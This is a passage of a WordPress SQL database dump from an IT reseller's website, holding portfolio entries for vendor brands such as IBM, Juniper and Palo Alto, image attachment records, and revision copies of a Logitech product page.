src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','HPE','','publish','closed','closed','','hpe','','','2019-01-02 17:00:04','2019-01-02 09:00:04','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1387',0,'portfolio','',0),(1388,1,'2018-12-11 12:35:00','2018-12-11 04:35:00','<a href=\"http://bintara.com.my/huawei\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1829\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Huawei-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','HUAWEI','','publish','closed','closed','','huawei','','','2019-01-02 17:00:20','2019-01-02 09:00:20','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1388',0,'portfolio','',0),(1389,1,'2018-12-11 12:35:16','2018-12-11 04:35:16','<a href=\"http://bintara.com.my/ibm\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1830\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/IBM-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','IBM','','publish','closed','closed','','ibm','','','2019-01-02 17:00:39','2019-01-02 09:00:39','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1389',0,'portfolio','',0),(1390,1,'2018-12-11 12:35:50','2018-12-11 04:35:50','<a href=\"http://bintara.com.my/infocus\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1772\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Infocus-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','INFOCUS','','publish','closed','closed','','infocus','','','2019-01-02 17:01:27','2019-01-02 09:01:27','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1390',0,'portfolio','',0),(1391,1,'2018-12-11 12:36:06','2018-12-11 04:36:06','','logitech-screen-share','','inherit','closed','closed','','logitech-screen-share','','','2018-12-11 12:36:06','2018-12-11 04:36:06','',16,'https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png',0,'attachment','image/png',0),(1392,1,'2018-12-11 12:36:50','2018-12-11 04:36:50','','group-expansion-microphones','','inherit','closed','closed','','group-expansion-microphones','','','2018-12-11 12:36:50','2018-12-11 04:36:50','',16,'https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png',0,'attachment','image/png',0),(1393,1,'2018-12-11 12:37:13','2018-12-11 04:37:13','Office headsets. <a href=\"http://bintara.com.my/jabra\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1682\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','JABRA','','publish','closed','closed','','jabra','','','2019-01-02 17:03:34','2019-01-02 09:03:34','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1393',0,'portfolio','',0),(1394,1,'2018-12-11 12:37:34','2018-12-11 04:37:34','<a href=\"http://bintara.com.my/juniper\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1683\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Juniper-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','JUNIPER','','publish','closed','closed','','juniper','','','2019-01-02 17:03:58','2019-01-02 09:03:58','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1394',0,'portfolio','',0),(1395,1,'2018-12-11 12:37:53','2018-12-11 04:37:53','<a href=\"http://bintara.com.my/kaspersky\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1691\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-71x.png\" alt=\"\" width=\"1024\" height=\"681\" />','KASPERSKY','','publish','closed','closed','','kaspersky','','','2019-09-23 16:43:39','2019-09-23 08:43:39','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1395',0,'portfolio','',0),(1396,1,'2018-12-11 12:38:11','2018-12-11 04:38:11','<a href=\"http://bintara.com.my/kingston\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1685\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Kingston-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','KINGSTON','','publish','closed','closed','','kingston','','','2019-01-02 17:04:34','2019-01-02 09:04:34','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1396',0,'portfolio','',0),(1397,1,'2018-12-11 12:38:19','2018-12-11 04:38:19','','logitech-smartdock-flex','','inherit','closed','closed','','logitech-smartdock-flex','','','2018-12-11 12:38:19','2018-12-11 04:38:19','',16,'https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png',0,'attachment','image/png',0),(1398,1,'2018-12-11 12:38:29','2018-12-11 04:38:29','<a href=\"http://bintara.com.my/lenovo\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1693\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-91x.png\" alt=\"\" width=\"1024\" height=\"681\" />','LENOVO','','publish','closed','closed','','lenovo','','','2019-09-23 16:33:59','2019-09-23 08:33:59','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1398',0,'portfolio','',0),(1399,1,'2018-12-11 12:38:55','2018-12-11 04:38:55','Widescreen, 4K and Curved Monitors. <a href=\"http://bintara.com.my/lg\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1831\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-31x.png\" alt=\"\" width=\"1024\" height=\"681\" />','LG','','publish','closed','closed','','lg','','','2019-09-23 16:41:33','2019-09-23 08:41:33','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1399',0,'portfolio','',0),(1400,1,'2018-12-11 12:39:23','2018-12-11 04:39:23','Video Conferencing, Conference Cameras, Webcams and Headsets. <a href=\"http://bintara.com.my/logitech\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1694\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Logitech-Logo-1.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','LOGITECH','','publish','closed','closed','','logitech','','','2019-01-02 17:07:31','2019-01-02 09:07:31','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1400',0,'portfolio','',0),(1401,1,'2018-12-11 12:39:28','2018-12-11 04:39:28','','group-15m-extended-cable','','inherit','closed','closed','','group-15m-extended-cable','','','2018-12-11 12:39:28','2018-12-11 04:39:28','',16,'https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png',0,'attachment','image/png',0),(1402,1,'2018-12-11 12:39:55','2018-12-11 04:39:55','Desktop GIS\r\nGIS Mapping\r\n\r\n<a href=\"http://bintara.com.my/mapinfo\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1832\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MapInfo-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','MAPINFO','','publish','closed','closed','','mapinfo','','','2019-01-02 17:12:58','2019-01-02 09:12:58','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1402',0,'portfolio','',0),(1403,1,'2018-12-11 12:40:51','2018-12-11 04:40:51','Device Control\r\nEndpoint Protection for SMB\r\nEndpoint Security\r\nWeb Gateway\r\nWeb Protection\r\n\r\n<a href=\"http://bintara.com.my/mcafee\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone wp-image-1699 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-101x.png\" alt=\"\" width=\"1024\" height=\"681\" />','MCAFEE','','publish','closed','closed','','mcafee','','','2019-09-23 16:28:07','2019-09-23 08:28:07','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1403',0,'portfolio','',0),(1404,1,'2018-12-11 12:40:34','2018-12-11 04:40:34','','group-10m-extended-cable','','inherit','closed','closed','','group-10m-extended-cable','','','2018-12-11 12:40:34','2018-12-11 04:40:34','',16,'https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png',0,'attachment','image/png',0),(1405,1,'2018-12-11 12:41:33','2018-12-11 04:41:33','Portable Headsets. <a href=\"https://bintara.com.my/motorola/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1833\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','MOTOROLA','','publish','closed','closed','','motorola','','','2019-01-02 17:18:25','2019-01-02 09:18:25','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1405',0,'portfolio','',0),(1406,1,'2018-12-11 12:41:55','2018-12-11 04:41:55','','meetup-expansion-mics','','inherit','closed','closed','','meetup-expansion-mics','','','2018-12-11 12:41:55','2018-12-11 04:41:55','',16,'https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png',0,'attachment','image/png',0),(1407,1,'2018-12-11 12:42:06','2018-12-11 04:42:06','<a href=\"http://bintara.com.my/microsoft\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1700\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Microsoft-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','MICROSOFT','','publish','closed','closed','','microsoft','','','2019-01-02 17:17:56','2019-01-02 09:17:56','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1407',0,'portfolio','',0),(1408,1,'2018-12-11 12:42:52','2018-12-11 04:42:52','Data Storage, Cloud Data Services, Data Infrastructure Management, Data Backup And Recovery, All Flash Storage and Hybrid Flash Storage. <a href=\"https://bintara.com.my/netapp/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1701\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/NetApp-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','NETAPP','','publish','closed','closed','','netapp','','','2019-01-02 17:23:43','2019-01-02 09:23:43','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1408',0,'portfolio','',0),(1413,1,'2018-12-11 12:44:35','2018-12-11 04:44:35','Hyperconverged Infrastructure, Private Cloud Infrastructure. <a href=\"http://bintara.com.my/nutanix\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1835\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Nutanix-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','NUTANIX','','publish','closed','closed','','nutanix','','','2019-01-02 17:24:06','2019-01-02 09:24:06','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1413',0,'portfolio','',0),(1409,1,'2018-12-11 12:42:44','2018-12-11 04:42:44','At BINTARA, our comprehensive supply chain services ensure your IT estate is run efficiently and productively â€“ covering tailored procurement solutions through to complex international logistics.\r\n\r\nLearn more\r\n\r\n<!--more-->','Supply Chain Services','','inherit','closed','closed','','1362-revision-v1','','','2018-12-11 12:42:44','2018-12-11 04:42:44','',1362,'https://bintara.com.my/blog/2018/12/11/1362-revision-v1/',0,'revision','',0),(1410,1,'2018-12-11 12:43:14','2018-12-11 04:43:14','Create, edit, sign, and secure Portable Document Format (PDF) files and digital documents. <a href=\"http://bintara.com.my/nitro\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1834\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-171x.png\" alt=\"\" width=\"1024\" height=\"681\" />','KOFAX','','publish','closed','closed','','nitro','','','2019-09-23 16:50:49','2019-09-23 08:50:49','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1410',0,'portfolio','',0),(1411,1,'2018-12-11 12:44:09','2018-12-11 04:44:09','Healthcare AI Solutions, Print, capture &amp; PDF Solutions. <a href=\"http://bintara.com.my/nuance\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1774\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Nuance-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','NUANCE','','publish','closed','closed','','nuance','','','2019-01-02 15:40:15','2019-01-02 07:40:15','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1411',0,'portfolio','',0),(1412,1,'2018-12-11 12:43:49','2018-12-11 04:43:49','At BINTARA, our comprehensive supply chain services ensure your IT estate is run efficiently and productively â€“ covering tailored procurement solutions through to complex international logistics.\n\n<!--more-->\n\n&nbsp;','Supply Chain Services','','inherit','closed','closed','','1362-autosave-v1','','','2018-12-11 12:43:49','2018-12-11 04:43:49','',1362,'https://bintara.com.my/blog/2018/12/11/1362-autosave-v1/',0,'revision','',0),(1414,1,'2018-12-11 12:44:29','2018-12-11 04:44:29','At BINTARA, our comprehensive supply chain services ensure your IT estate is run efficiently and productively â€“ covering tailored procurement solutions through to complex international logistics.\r\n\r\n<!--more-->\r\n<ul>\r\n 	<li>Financial â€“ Leasing</li>\r\n 	<li>Configuration</li>\r\n</ul>','Supply Chain Services','','inherit','closed','closed','','1362-revision-v1','','','2018-12-11 12:44:29','2018-12-11 04:44:29','',1362,'https://bintara.com.my/blog/2018/12/11/1362-revision-v1/',0,'revision','',0),(1415,1,'2018-12-11 12:45:00','2018-12-11 04:45:00','Qualitative data analysis computer software package. <a href=\"http://bintara.com.my/nvivo\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1773\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Nivivo-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','NVIVO','','publish','closed','closed','','nvivo','','','2019-01-02 17:24:15','2019-01-02 09:24:15','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1415',0,'portfolio','',0),(1416,1,'2018-12-11 12:45:34','2018-12-11 04:45:34','Next-Generation Firewall, Cloud Security, Endpoint Protection. <a href=\"https://bintara.com.my/paloalto/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1703\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Palo-Alto.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','PALO ALTO','','publish','closed','closed','','paloalto','','','2019-01-02 17:24:23','2019-01-02 09:24:23','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1416',0,'portfolio','',0),(1417,1,'2018-12-11 12:45:58','2018-12-11 04:45:58','Office and Communication Solutions, Professional Camera, Visual System, Air Conditioning Systems. <a href=\"http://bintara.com.my/panasonic\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1836\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Panasonic-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','PANASONIC','','publish','closed','closed','','panasonic','','','2019-01-02 17:24:31','2019-01-02 09:24:31','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1417',0,'portfolio','',0),(1418,1,'2018-12-11 12:46:25','2018-12-11 04:46:25','Rugged Laptop and Rugged Tablet. <a href=\"https://bintara.com.my/panasonic-toughbook/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1719\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Toughbook-Logo-V2.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','PANASONIC TOUGHBOOK','','publish','closed','closed','','panasonic-toughbook','','','2019-01-02 17:29:16','2019-01-02 09:29:16','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1418',0,'portfolio','',0),(1419,1,'2018-12-11 12:46:23','2018-12-11 04:46:23','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2>CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong><span class=\"product-name\">SmartDock Extender Box</span></strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Screen Share</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\n<strong>Group Expansion Mics</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nLogitech SmartDock Flex\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 15m Extended Cable\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n\r\nGroup 10m Extended Cable\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\"><img class=\"size-full wp-image-1406 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" width=\"393\" height=\"393\" />\r\n<p style=\"text-align: center;\">MeetUp Expansion Mic</p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2018-12-11 12:46:23','2018-12-11 04:46:23','',16,'https://bintara.com.my/blog/2018/12/11/16-revision-v1/',0,'revision','',0),(1420,1,'2018-12-11 12:46:52','2018-12-11 04:46:52','Dual-WAN, Multi-WAN Internet Link Load Balancing Routers. <a href=\"https://bintara.com.my/peplink/\">Read More...</a>\r\n\r\n<!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1775\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Peplink-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','PEPLINK','','publish','closed','closed','','peplink','','','2019-01-02 17:32:45','2019-01-02 09:32:45','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1420',0,'portfolio','',0),(1421,1,'2018-12-11 12:47:51','2018-12-11 04:47:51','Live Forensic Solution for Quick Response. <a href=\"https://bintara.com.my/qator-live/\">Read More...</a>','QATOR LIVE','','private','closed','closed','','qator-live','','','2019-09-23 10:22:22','2019-09-23 02:22:22','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1421',0,'portfolio','',0),(1422,1,'2018-12-11 12:47:16','2018-12-11 04:47:16','<div class=\"product-details-ctn\">\r\n<h1 class=\"product-details-name\">Logitech</h1>\r\n</div>\r\n<div class=\"product-details-ctn\">\r\n<h2 style=\"text-align: center;\">CONFERENCE CAMERAS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>\r\n\r\n<table border=\"0px\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1242 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Group</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1249 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" width=\"300\" height=\"262\" />\r\n\r\n<strong>Logitech Rally</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1316 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /><strong>Logitech MeetUp</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1318 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Connect</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1319 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech BCC950</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1321 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech PTZ Pro 2</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">VC ROOM SOLUTIONS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>\r\n<img class=\"wp-image-1327 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong><span class=\"product-name\">SMARTDOCK</span></strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">WEBCAMS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1332 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech Brio</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"aligncenter wp-image-1334 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C9230e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n<td width=\"200\"><img class=\"alignnone wp-image-1336 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n<strong>Logitech C925e</strong>\r\n\r\n[maxbutton id=\"1\"]</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">Â <img class=\"wp-image-1354 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech B525</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<h2></h2>\r\n<h2 style=\"text-align: center;\">HEADSETS</h2>\r\n<p class=\"lead\" style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>\r\n<img class=\"wp-image-1364 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n<p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\"]</p>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\"alignnone size-full wp-image-1386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" 